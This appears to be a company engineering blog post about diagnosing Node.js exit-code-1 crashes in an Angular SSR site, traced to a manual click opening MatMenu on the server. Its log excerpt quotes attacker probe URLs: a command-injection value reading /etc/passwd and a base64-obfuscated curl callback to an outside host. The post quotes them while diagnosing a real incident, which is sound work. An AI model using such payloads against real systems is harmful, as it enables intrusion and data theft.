Diagnosing and Resolving Node Server Crashes in Angular SSR: A Comprehensive Case Study

node server crash Jun 28, 2024

In the world of web development, encountering server crashes is not uncommon. These crashes can disrupt the user experience and impact business operations. Recently, at Halodoc, we encountered one such issue where our website was crashing with Exit Code 1.

In this case study, we'll delve into the incident and explore the steps taken to diagnose and resolve the issue.

Background:

Our website, built with Angular, serves a large volume of customers daily. Recently, it experienced intermittent server crashes that caused downtime and affected the business. The crashes followed no obvious pattern: some occurred during peak traffic hours, while others happened at seemingly random times. This unpredictability made it challenging to pinpoint the root cause.

Diagnosis:

Exit Code: Exit codes in Node.js provide a standardised way to indicate whether a process terminated successfully or failed. This was our first clue. The server was crashing with Exit Code 1, which Node.js uses for an uncaught fatal exception. This pointed to an application-level error rather than an infra-related issue such as a CPU or memory threshold breach.

Refer to this doc for more details about exit codes.
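As a quick illustration of the exit codes discussed above, the sketch below starts two throwaway Node.js child processes and reads their exit codes. The helper name exitCodeOf and both one-line scripts are made up for this example; they are not taken from our server code.

```typescript
import { spawnSync } from "node:child_process";

/** Runs a one-line script in a child Node.js process and returns its exit code. */
function exitCodeOf(script: string): number | null {
  // stdio is ignored so the child's stack trace does not clutter the output.
  const result = spawnSync(process.execPath, ["-e", script], { stdio: "ignore" });
  return result.status;
}

// A script that finishes normally exits with code 0.
const cleanExit = exitCodeOf("console.log('ok')");

// An error thrown inside a timer callback has no caller that can catch it,
// so it reaches the top level and the process exits with code 1.
const crashExit = exitCodeOf("setTimeout(() => { throw new Error('boom'); }, 10)");

console.log({ cleanExit, crashExit });
```

The second script mirrors the shape of the failure described later in this case study: an error raised asynchronously with nothing in place to catch it.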

Application Performance Monitoring: Since the application was crashing with Exit Code 1, CPU and memory were unlikely to be the cause. Still, we checked the server's resource consumption just before the crash, and it looked normal.

Log Addition: Since the server was crashing randomly without any CPU or memory threshold breach, we hypothesised that the issue was limited to certain pages, and that the server crashed whenever users hit those pages. To test this hypothesis, we added a custom log that prints the request URL for every server request.

server.get('*', (req, res, next) => {
  const {protocol, originalUrl, baseUrl, headers} = req;
  
  /** Additional log to print the request URL */
  console.log(`\n************* ${req.url} *************\n`);

  commonEngine
      .render({
        bootstrap,
        documentFilePath: indexHtml,
        url: `${protocol}://${headers.host}${originalUrl}`,
        publicPath: browserDistFolder,
        providers: [{provide: APP_BASE_HREF, useValue: baseUrl}],
      })
      .then((html) => res.send(html))
      .catch((err) => next(err));
});

The application was redeployed with the custom logging.
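Logging every request works, but it means scanning a large log after each crash. One possible alternative, shown here only as a sketch and not as what we deployed, is to keep the most recent URLs in memory and print them when the process is about to die. The class RecentUrlBuffer, the variable recentUrls, and the capacity of 15 are all hypothetical.

```typescript
/** Keeps only the most recent `capacity` request URLs in memory. */
class RecentUrlBuffer {
  private readonly urls: string[] = [];
  private readonly capacity: number;

  constructor(capacity: number) {
    this.capacity = capacity;
  }

  /** Stores a URL and drops the oldest one once the buffer is full. */
  record(url: string): void {
    this.urls.push(url);
    if (this.urls.length > this.capacity) {
      this.urls.shift();
    }
  }

  /** Returns a copy of the stored URLs, oldest first. */
  snapshot(): string[] {
    return [...this.urls];
  }
}

const recentUrls = new RecentUrlBuffer(15);

// Hypothetical wiring: call recentUrls.record(req.url) inside the request handler.
// The listener below only observes the crash; the process still exits afterwards.
process.on("uncaughtExceptionMonitor", () => {
  console.error("Last requests before crash:", recentUrls.snapshot());
});
```

With this in place, the last few URLs would appear together at the very end of the log instead of being interleaved with unrelated output.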

Observations:

In the server logs of the next crash, we mainly checked the last 10-15 URLs that were hit just before the server crashed. We saw request URLs like these:

  • /rumah-sakit/tindakan-medis/radiologi-2?category_slug=FUZZ&tangerang=FUZZ&terdekat=%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd
  • /rumah-sakit/tindakan-medis/radiologi-2?category_slug=FUZZ&tangerang=FUZZ&terdekat=%20curl%20%20%24%28echo%20aHR0cHM6Ly9lbmh2Y3UxMnkwOWx0N3kubS5waXBlZHJlYW0ubmV0P3JjZT1ZWEpsY1QxeVRVRkNkRlJtSm1odmMzUTlkM2QzTG1oaGJHOWtiMk11WTI5dEpuQmhjbUZ0UFhSbGNtUmxhMkYwSm5CaGRHZzlKVEpHY25WdFlXZ3RjMkZyYVhRbE1rWjBhVzVrWVd0aGJpMXRaV1JwY3lVeVJuSmhaR2x2Ykc5bmFTMHlKblI1Y0dVOWNtTmxYMkpzYVc1a0puVjBZejB4TnpBNU56azVOREUw%20%7C%20base64%20-d%29
  • /rumah-sakit/tindakan-medis/radiologi-2?category=123&category_slug=123&checkcache=123&donotbackuprrd=123&m3utitle=123&mh=123&string=123&tangerang=123&terdekat=123&toProcess=123

The query parameters in these URLs didn't look normal. Our application had no use case for such query parameters, so it seemed that someone was probing our website with malicious URLs. We hit these URLs locally in SSR mode and saw the same error on the local server: it crashed with Exit Code 1.
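To see why these parameters look malicious, it helps to decode them. The sketch below uses the standard URL API to decode the first URL from the list above; the helper decodeQuery and the placeholder base http://localhost are assumptions made for this example.

```typescript
/** Returns the decoded query parameters of a request path as [name, value] pairs. */
function decodeQuery(path: string): Array<[string, string]> {
  // The base is a placeholder; only the path and query string matter here.
  const url = new URL(path, "http://localhost");
  const pairs: Array<[string, string]> = [];
  url.searchParams.forEach((value, name) => {
    pairs.push([name, value]);
  });
  return pairs;
}

const suspiciousPath =
  "/rumah-sakit/tindakan-medis/radiologi-2?category_slug=FUZZ&tangerang=FUZZ&terdekat=%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd";

for (const [name, value] of decodeQuery(suspiciousPath)) {
  console.log(`${name} = ${value}`);
}
// The last line printed is: terdekat = ;cat${IFS}/etc/passwd
```

The decoded value is a shell command fragment that tries to read /etc/passwd, which is consistent with an automated scanner fuzzing query parameters rather than a real user.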

After examining the code related to the aforementioned routes, we discovered that the application was crashing due to the following statement:

timer(10).subscribe(() => {
   this.suggestionSearchInput.nativeElement.click();
});

where suggestionSearchInput is a ViewChild.

In reality, it wasn't the click method that caused the issue, but rather the listener attached to this click event. The listener was supposed to open a list of items using MatMenu. However, the MatMenu component is not compatible with SSR as it accesses the DOM using document, which led to a ReferenceError: document is not defined on the server. This error was not caught by either the library or the application code.

Another point to note is that this click function was executed asynchronously using an RxJS timer. Upon removing the timer, the application did not crash. To understand this, let's look at the HTML code first.

<input
  [matMenuTriggerFor]="suggestionMenu"
  #suggestionSearchInput
/>

<mat-menu
  #suggestionMenu="matMenu"
  role="menu"
>
  ...
</mat-menu>

Here, the MatMenu is accessed as a template reference variable. Template reference variables in Angular are not immediately available in the lifecycle hooks before ngAfterViewInit. They are initialised and can be accessed only after the view has been fully initialised. In our case, the click was being performed in the ngOnInit lifecycle hook, which is before ngAfterViewInit.

For more details on Angular lifecycle hooks, please refer to this.

So, when the click is executed synchronously, the MatMenu is not yet available. When the click is executed asynchronously, however, the template reference variable for MatMenu has become available by the time the click is performed. The click therefore tries to open the menu, causing ReferenceError: document is not defined, which is not caught by either the library or the application code.

If an error is not handled and propagates to the top level, the Node.js process crashes with Exit Code 1 by default. Adding a handler for the uncaughtException event overrides this default behaviour. It is also possible to monitor uncaughtException events without overriding the default exit behaviour by installing an uncaughtExceptionMonitor listener. The uncaughtExceptionMonitor event is emitted before the uncaughtException event.
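A minimal sketch of such a monitor listener is shown below. The function describeCrash and its log format are hypothetical; only process.on and the uncaughtExceptionMonitor event come from Node.js itself.

```typescript
/** Formats an uncaught error into a single log line. */
function describeCrash(error: Error, origin: string): string {
  return `[crash] origin=${origin} message=${error.message}`;
}

// The monitor listener only observes the error. After it runs, Node.js still
// terminates the process with exit code 1, so the default behaviour is kept.
process.on("uncaughtExceptionMonitor", (error, origin) => {
  console.error(describeCrash(error, origin));
});
```

Registering the same callback for uncaughtException instead would keep the process alive after the error, which is usually not what you want for a server left in an unknown state.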

For more details, please refer to these docs on uncaughtException and error propagation & interception.

Resolution:

Since the issue was caused by attempting to fire the click event manually on the server, we implemented a solution to ensure that this logic only executed in the browser. This approach aligns with best practices for server-side rendering (SSR), which involve preventing certain actions that are intended for client-side execution only.


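// platformId is assumed to be injected via the PLATFORM_ID token from @angular/core
timer(10).subscribe(() => {
   // Fire the click only in the browser; on the server, opening MatMenu touches `document`
   if (isPlatformBrowser(this.platformId)) {
      this.suggestionSearchInput.nativeElement.click();
   }
});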

isPlatformBrowser is a function provided by the @angular/common library. It takes the platform ID, which is obtained by injecting the PLATFORM_ID token from @angular/core, and returns true only when the application is running in a browser.

The application was redeployed with the updated code, and subsequent monitoring showed no further occurrences of server crashes with Exit Code 1.

To mitigate similar issues in the future, we audited our application to ensure that only SSR-compatible code is executed during server-side rendering. We put the following guidelines in place for code that can run in SSR environments:

  1. Direct DOM Manipulations: Avoid using methods like getElementById, querySelector, innerHTML, outerHTML, etc., which directly manipulate the DOM, as they can lead to inconsistencies between server-rendered and client-rendered content.
  2. Adding Event Listeners: Refrain from adding event listeners directly in SSR environments, as they may not behave as expected and can cause server crashes.
  3. Manually Firing Events: Avoid manually firing events like click, mouseover, scroll, etc., in SSR environments, as they can trigger unexpected behaviour and compromise server stability.
  4. Usage of Browser APIs: Exercise caution when using browser-specific APIs like window, document, navigator, localStorage, sessionStorage, etc., in SSR environments, as they may not be available or behave differently on the server.
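Outside Angular components, where isPlatformBrowser and an injected platform ID may not be at hand, the guidelines above can be approximated with a plain check for browser globals. The sketch below is framework-free and the names hasBrowserGlobals and browserOnly are hypothetical; inside Angular code, isPlatformBrowser remains the check we use.

```typescript
/** True only when the usual browser globals exist (a rough, framework-free check). */
function hasBrowserGlobals(): boolean {
  const globals = globalThis as unknown as Record<string, unknown>;
  return typeof globals["window"] !== "undefined" && typeof globals["document"] !== "undefined";
}

/** Runs `action` only in a browser-like environment; otherwise returns `fallback`. */
function browserOnly<T>(action: () => T, fallback: T): T {
  return hasBrowserGlobals() ? action() : fallback;
}

// Hypothetical usage: the callback stands in for any code that touches browser APIs,
// such as reading localStorage or firing a click on an element.
let clicked = false;
browserOnly(() => {
  clicked = true;
}, undefined);

console.log(clicked); // false when run under Node.js, where `document` is not defined
```

Wrapping browser-only logic this way keeps the guard in one place, so a missed check is less likely to reach the server.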

By adhering to these guidelines and implementing checks that keep browser-only code from running during SSR, we ensure the consistency and reliability of our web applications across different environments.

Core Learnings:

  1. Environment-Specific Code Execution: Considering the execution context and environment-specific behaviour when writing code is crucial, especially in applications with server-side rendering capabilities. Implementing checks to ensure that code executes only in appropriate environments can prevent unexpected behaviour and server crashes.
  2. Thorough Log Analysis: Comprehensive log analysis is essential for identifying the root cause of server crashes. However, in cases where standard logs may not provide sufficient information, implementing custom logging can offer valuable insights into specific areas of the application. It can help with targeted investigation and enable us to pinpoint the root cause more efficiently.
  3. Hypothesis Testing and Iterative Diagnosis: Formulating hypotheses based on observed patterns and testing them through targeted interventions can help to narrow down the scope of investigation and focus on relevant areas of the application. Iterative diagnosis and hypothesis testing are essential strategies for effective troubleshooting.
  4. Defensive Programming: Incorporating defensive programming techniques, such as adding conditional checks, can help safeguard applications against unexpected behaviour and mitigate potential risks, ensuring the reliability and stability of web applications.

Conclusion:

Troubleshooting server crashes requires a systematic approach, including thorough log analysis, hypothesis testing, and targeted interventions. By applying these strategies and lessons learned, we were able to diagnose and resolve the server crash issue effectively, ensuring the continued stability and reliability of the website.

This experience underscores the importance of proactive monitoring, meticulous analysis, and strategic intervention in troubleshooting server crashes. By adopting a proactive approach to monitoring and maintenance, coupled with adherence to best practices in web development, we can minimise downtime, enhance user experience, and ensure the long-term stability and performance of the web applications.

As we continue to navigate the complexities of web development, let this case study serve as a reminder of the value of continuous improvement and vigilance in maintaining the reliability and resilience of our digital platforms.

Join us

Scalability, reliability, and maintainability are the three pillars that govern what we build at Halodoc Tech. We are actively looking for engineers at all levels, and if solving hard problems with challenging requirements is your forte, please reach out to us with your resume at careers.india@halodoc.com.

About Halodoc

Halodoc is the number 1 all-around healthcare application in Indonesia. Our mission is to simplify and bring quality healthcare across Indonesia, from Sabang to Merauke. We connect 20,000+ doctors with patients in need through our Tele-consultation service. We partner with 3500+ pharmacies in 100+ cities to bring medicine to your doorstep. We've also partnered with Indonesia's largest lab provider to provide lab home services, and to top it off we have recently launched a premium appointment service that partners with 500+ hospitals, allowing patients to book a doctor appointment inside our application. We are extremely fortunate to be trusted by our investors, such as the Bill & Melinda Gates Foundation, Singtel, UOB Ventures, Allianz, GoJek, Astra, Temasek, and many more. We recently closed our Series D round and in total have raised around USD$100+ million for our mission. Our team works tirelessly to make sure that we create the best healthcare solution personalised for all of our patients' needs, and we are continuously on a path to simplify healthcare for Indonesia.

Bivesh Kumar

Software Development Engineer III